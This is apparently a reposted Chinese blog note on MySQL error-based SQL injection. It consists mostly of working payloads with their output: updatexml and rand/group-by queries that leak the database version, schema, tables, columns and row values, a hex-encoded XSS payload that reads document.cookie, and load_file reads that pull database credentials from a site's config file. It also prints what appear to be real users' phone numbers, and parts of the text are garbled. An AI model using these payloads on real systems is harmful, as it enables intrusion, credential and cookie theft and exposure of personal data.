mysql基于“报错”的注入

mysql基于“报错”的注入

报错是如何转为xss的？

mysql语句在页面报错，泄露信息
=========================================================================================================================================================================
*	报错方式之“updatexml”，有字数限制，但无需配合union。-	mysql> select updatexml(1, concat(':', 'test'), 1);ERROR 1105 (HY000): XPATH syntax error: ':test'-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);ERROR 1105 (HY000): XPATH syntax error: ':test'-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);ERROR 1105 (HY000): XPATH syntax error: '^test'-	mysql>  select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);ERROR 1105 (HY000): XPATH syntax error: '^test'**	将上面‘test’换成你的子查询语句或函数均可。*	group by+rand(0)+having，无字数限制，无需配合union。-	mysql>  select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'*	报错方式之“rand+count+group by”，需配合unionrand(0)无论在哪台机器运行多少次，生成的序列都是一样的参考mysql开发者社区曝光的bug .php?id=8652-	mysql>  select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'-	mysql>  select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'**	将上面‘test’换成你的子查询语句或函数均可。mysql转xss语句mysql>  select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry '/><img src="fuck" οnerrοr=kie)>^0.7' for key 'group_key'直接爆配置文件密码，前提是有file权限mysql>	select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'mysql>  select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','爆版本mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'爆库名mysql> select info();ERROR 1305 (42000): FUNCTION fangjiangjun.info does not existmysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'爆表名mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x; ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x; ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x; ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'爆字段名mysql>  select concat( (select distinct column_name from lumns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'mysql>  select concat( (select distinct column_name from lumns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'爆字段值mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x; ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'mysql>  select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x; ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'

转载于:.html